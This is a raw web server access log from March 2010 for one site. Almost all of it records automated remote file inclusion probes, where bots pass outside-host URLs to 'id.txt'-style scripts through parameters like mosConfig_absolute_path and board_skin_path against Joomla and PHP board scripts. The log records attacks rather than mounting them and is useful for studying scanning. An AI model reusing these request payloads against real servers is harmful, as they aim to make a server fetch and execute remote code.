61.43.89.13 - - [04/Mar/2010:08:11:40 -0800] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:08:11:40 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:08:11:40 -0800] "GET /logs/access_100222.log%20%20///bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:08:12:11 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:12:28 -0800] "GET /logs/access_100203.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:08:12:36 -0800] "GET /logs/access_100217.log%20%20///bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:13:20 -0800] "GET /logs/access_100210.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:08:15:59 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:08:15:59 -0800] "GET /logs/access_100222.log%20%20///bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:08:16:00 -0800] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.225.229.162 - - [04/Mar/2010:08:16:01 -0800] "GET /logs/access_100201.log//?_SERVER%5BDOCUMENT_ROOT%5D=add%20this? HTTP/1.1" 404 5258 "-" "libwww-perl/5.832" "www.puaga.com"
66.225.229.162 - - [04/Mar/2010:08:16:02 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=add%20this? HTTP/1.1" 200 3642 "-" "libwww-perl/5.832" "www.puaga.com"
66.225.229.162 - - [04/Mar/2010:08:16:02 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=add%20this? HTTP/1.1" 200 4947 "-" "libwww-perl/5.832" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:16:04 -0800] "GET /logs/access_100213.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:16:04 -0800] "GET /index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:16:06 -0800] "GET /logs/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:16:12 -0800] "GET /logs/access_100129.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:08:16:42 -0800] "GET /logs/access_100217.log%20%20///bbs/write_comment_update.php?board_skin_path=http://csm.postech.ac.kr/bbs/skin/daerew_45galleryGD/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:17:26 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:17:29 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:18:24 -0800] "GET /logs/access_100213.log%20/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:18:25 -0800] "GET /logs/access_100129.log%20/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:08:20:05 -0800] "GET /logs/access_100226.log//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:20:59 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:20:59 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:20:59 -0800] "GET /logs/access_100210.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:08:22:31 -0800] "GET /logs/bughttp://www.lifehappens.org/cache/nulnul/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:08:22:31 -0800] "GET /bughttp://www.lifehappens.org/cache/nulnul/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:08:22:41 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:08:22:41 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:08:22:41 -0800] "GET /logs/access_100210.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:22:48 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:22:48 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:22:48 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:24:37 -0800] "GET /logs/access_100222.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:08:25:18 -0800] "GET /logs/access_100222.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:25:44 -0800] "GET /ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:25:44 -0800] "GET /logs//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:25:44 -0800] "GET /logs/access_100218.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:08:25:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:08:25:55 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:08:25:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:26:02 -0800] "GET /logs/access_100209.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:08:26:38 -0800] "GET /logs/access_100202.log//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:06 -0800] "GET /logs/access_100220.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:06 -0800] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:06 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:13 -0800] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:13 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:13 -0800] "GET /logs/access_100220.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:25 -0800] "GET /logs/access_100221.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.235.124.15 - - [04/Mar/2010:08:28:31 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.puaga.com"
66.235.124.15 - - [04/Mar/2010:08:28:32 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:33 -0800] "GET /logs/access_100221.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:35 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:36 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:28:36 -0800] "GET /logs/access_100205.log//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:29:03 -0800] "GET /logs/access_100130.log//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:29:49 -0800] "GET /logs/access_100205.log%20/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:29:49 -0800] "GET /index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:29:49 -0800] "GET /logs/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:29:59 -0800] "GET /logs//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:29:59 -0800] "GET /ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:29:59 -0800] "GET /logs/access_100218.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:30:22 -0800] "GET /logs/access_100209.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:30:38 -0800] "GET /logs/access_100220.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:30:38 -0800] "GET /logs/access_100221.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:30:41 -0800] "GET /logs/access_100220.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:30:41 -0800] "GET /logs/access_100221.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:08:31:37 -0800] "GET /logs/access_100128.log//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:31:50 -0800] "GET /logs/access_100209.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:08:31:56 -0800] "GET /logs/access_100207.log//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:32:08 -0800] "GET /logs/access_100205.log//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:32:09 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:32:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:08:32:29 -0800] "GET /logs/access_100205.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
79.174.72.82 - - [04/Mar/2010:08:33:13 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.174.72.82 - - [04/Mar/2010:08:33:13 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.174.72.82 - - [04/Mar/2010:08:33:13 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:33:39 -0800] "GET /logs/access_100210.log//phpSecurePages/secure.php?&cfgProgDir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:33:49 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:33:49 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:33:49 -0800] "GET /logs/access_100209.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:33:49 -0800] "GET /logs/access_100221.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:34:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:34:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:34:01 -0800] "GET /logs/access_100213.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:34:05 -0800] "GET /logs/access_100218.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:34:05 -0800] "GET /ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:34:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:34:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:34:34 -0800] "GET /logs/access_100213.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:34:53 -0800] "GET /logs/access_100209.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:35:07 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:35:07 -0800] "GET /logs/access_100221.log/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:35:07 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:35:07 -0800] "GET /logs/access_100209.log/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:35:14 -0800] "GET /logs/access_100218.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:35:27 -0800] "GET /ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:35:27 -0800] "GET /logs//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:35:27 -0800] "GET /logs/access_100218.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:35:29 -0800] "GET /logs/access_100205.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:08:35:39 -0800] "GET /logs/access_100218.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:36:08 -0800] "GET /logs/access_100209.log%20%20//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:37:03 -0800] "GET /logs/access_100130.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:38:55 -0800] "GET /logs/access_100205.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:41:44 -0800] "GET /logs/access_100209.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:08:41:44 -0800] "GET /logs/access_100221.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [04/Mar/2010:08:43:13 -0800] "GET /logs/access_100211.log/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:08:48:39 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:08:48:39 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:08:48:39 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:08:48:44 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:08:48:45 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
